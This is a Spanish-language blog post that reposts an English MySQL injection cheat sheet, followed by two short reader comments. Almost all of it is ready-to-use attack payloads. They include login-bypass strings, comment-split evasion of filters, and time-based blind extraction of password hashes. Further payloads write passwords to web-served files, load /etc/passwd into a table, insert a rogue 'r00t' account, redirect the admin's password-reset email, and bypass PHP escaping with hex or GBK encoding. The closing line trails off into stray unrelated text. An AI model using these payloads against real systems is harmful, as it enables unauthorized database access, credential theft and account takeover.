SQL Injection cheat sheet

Los siguientes “trucos” para SQL Injection son una colección de una web llamada 0x000000.com que lamentablemente en la actualidad no esta disponible, los tenía guardados por ahí hace tiempo y quiero compartirlos con ustedes:

A collection of known and working SQL vectors. These vectors are designed and tested by me on my localhost. I kept the list clean and concise tested for all MySQL versions to date unless stated otherwise. This sheet is under constant development, please come back often. Note that most of these vectors can be used on SQL server or Oracle but mainly it is written and tested for MySQL only. What I give you here is basicly everything you ever need to know about MySQL injection. You have to construct the pieces yourself and probably need to know what they do in order to use them.

Basics

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Use inside login form:

1' OR 1=1--
1' OR '1' = '1
'
''
'or"='
') or ('a'='a
") or ("a"="a
hi" or "a"="a
or a=a--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a

Variations:

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

 SHOW TABLES
 SELECT * FROM login WHERE id = 1 or 1=1 AND SHOW TABLES

 SELECT VERSION
 SELECT * FROM login WHERE id = 1 or 1=1 AND SELECT VERSION()

 SELECT host,user,db from mysql.db
 SELECT * FROM login WHERE id = 1 or 1=1 AND select host,user,db from mysql.db;

Blind injection vectors collection
Operators

SELECT 1 && 1;
 SELECT 1 || 1;
 SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
 SELECT 0.1 <= 2;
 SELECT 2 >= 2;
 SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
 SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
 SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
 (this takes around 5 sec on a localhost)

 SELECT BENCHMARK(1000000,MD5(CHAR(116)))
 (this takes around 7 sec on a localhost)

 SELECT BENCHMARK(10000000,MD5(CHAR(116)))
 (this takes around 70 sec on a localhost!)

 Using the timeout to check if user exists
 SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your browser!
Gathering info
Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
 SELECT * FROM tablename WHERE user LIKE "%"
 SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
 SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = 'user@site.com';
 SELECT * FROM tablename WHERE user LIKE "%root%"
 SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors
Writing info into files.

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
 CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
 CHAR( 39))

Note: You must specify a new file, it may not exists and give the correct pathname.

The CHAR() quoteless function.

SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),
 CHAR(110),CHAR( 39))

 SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login

This evaluates the first char of the password hash from user ‘root’ which is ‘a’ (ASCII 97).

The hash is max 32 chars, and for every chars you’ll need to execute the query with CHAR()

The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example.

SELECT user FROM login WHERE user = 'admin'
 UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login

 SELECT user FROM login WHERE user = 'admin'
 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5('x')),null) FROM login

 where: (passwordfield,startcharacter,selectlength)

 is like: (password,1,2) this selects: 'ab'
 is like: (password,1,3) this selects: 'abc'
 is like: (password,1,4) this selects: 'abcd' 

A quoteless example:

SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
 UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login 

Possible chars
0 to 9 – ASCII 48 to 57 ~ a to z – ASCII 97 to 122
Misc.
Insert a new user into DB

INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user.

load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp

SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for “forgot login retrieval.”

UPDATE users set email = 'mymail@site.com' WHERE email = 'admin@site.com';

Bypassing PHP functions
Bypassing addslashes() with GBK HEX encoding.

WHERE x = 0xbf27 admin 0xbf27

Using an HEX encoded query to bypass escaping.

Normal: SELECT * FROM login WHERE user = 'root'
 Bypass: SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal: insert into login set user = 'root', pass = 'root'
 Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determin the HEX value for injection.

SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.

With comments.

S/**/E/**/L/**/E/**/C/**/T * F/**/R/**/O/**/M l/**/o/**/g/**/i/**/n
 W/**/H/**/E/**/R/**/E u/**/s/**/e/**/r = 0x726F6F74

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string" に関する追加情報:

(MySQL 4.1.x before 4.1.20 and 5.0.x)

  2 Comentarios

  1. Angelfire   •  

    Muy bueno parcero, algo así andaba buscando 😀

  2. Pingback: Códigos de Inyección SQL

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *